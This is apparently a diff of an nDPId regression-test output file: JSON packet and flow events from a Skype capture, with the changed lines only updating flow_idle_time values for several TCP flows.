-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1431969657511,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657511,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wcBAAEAG4VfAqAEinTc4qsNxnE+r6BKFPu7rUoAQECyHNAAAAQEICj4ixiZNea1+"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431969657579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657579,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxgw3AfJGVIsd5fP6ASOJAHOgAAAgQFrAQCCApMZC+DPiLFlwEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431969657579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657579,"pkt":"0NQSxnP1PBXCt3IOCABFAAA04EdAAEAGx03AqAEinTg0LMNwnGCx3l8\/HyRlSYAQECxdkgAAAQEICj4ixmlMZC+D"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50035,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QmIAAEARVi\/AqAEiQTffJjLdnE8AIJ1Im8QCCqRVDPPz90033q\/EDoSNqvvC54ua"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -232,20 +232,20 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4VhMAAEARqOnAqAEib91KETLdnFYAJFy+m8wCfUg82Gg6DnsozSUd0tlDoiZPS7EFljPm7g=="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431969658978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyihAAEAG3WDAqAEinTg0LMN0AbuAxvN6AAAAALAC\/\/9gYQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABAnpdAAEAGBHXAqAEinTc4qsN1AbtlArMMAAAAALAC\/\/+4FQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABACelAAEAGT0HAqAEinTeCjMN2AbvInJj+AAAAALAC\/\/8kpgAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1431969659109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659109,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIgG7w3aulZl7yJyY\/6ASOJBvwQAAAgQFrAQCCApOvfZ9PiLL2QEDAwk="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1431969659109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659109,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l91AAEAGwVjAqAEinTeCjMN2AbvInJj\/rpWZfIAQECzGaQAAAQEICj4izFtOvfZ9"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1431969659127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659127,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIgG7w3W+IGdaZQKzDaASOJBudwAAAgQFrAQCCApNea8RPiLL2QEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1431969659127,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659127,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5BAAEAG44fAqAEinTc4qsN1AbtlArMNviBnW4AQECzFDgAAAQEICj4izGxNea8R"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1431969659189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659189,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7w3TcDZ\/TgMbze6ASOJA\/bQAAAgQFrAQCCApMZDEWPiLL2QEDAwk="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1431969658978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658978,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyihAAEAG3WDAqAEinTg0LMN0AbuAxvN6AAAAALAC\/\/9gYQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABAnpdAAEAGBHXAqAEinTc4qsN1AbtlArMMAAAAALAC\/\/+4FQAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658979,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":50038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1431969658979,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658979,"pkt":"0NQSxnP1PBXCt3IOCABFAABACelAAEAGT0HAqAEinTeCjMN2AbvInJj+AAAAALAC\/\/8kpgAAAgQFtAEDAwUBAQgKPiLL2QAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1431969659109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659109,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIgG7w3aulZl7yJyY\/6ASOJBvwQAAAgQFrAQCCApOvfZ9PiLL2QEDAwk="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1431969659109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659109,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0l91AAEAGwVjAqAEinTeCjMN2AbvInJj\/rpWZfIAQECzGaQAAAQEICj4izFtOvfZ9"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1431969659127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659127,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIgG7w3W+IGdaZQKzDaASOJBudwAAAgQFrAQCCApNea8RPiLL2QEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1431969659127,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659127,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0v5BAAEAG44fAqAEinTc4qsN1AbtlArMNviBnW4AQECzFDgAAAQEICj4izGxNea8R"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1431969659189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969659189,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIgG7w3TcDZ\/TgMbze6ASOJA\/bQAAAgQFrAQCCApMZDEWPiLL2QEDAwk="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3kJUAAEARCA3AqAEiQTffEjLdgQkAIzBxm84CB+tg2yEaM9\/bL8TBCQEYokW3ou6uIFeA"} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -261,10 +261,10 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BWcAAEAR4iHAqAEinTg0LTLdnEwAIdjym9YCeMy7FyJwEm6ud1zY3LUeAZMSqKDeqQ=="} 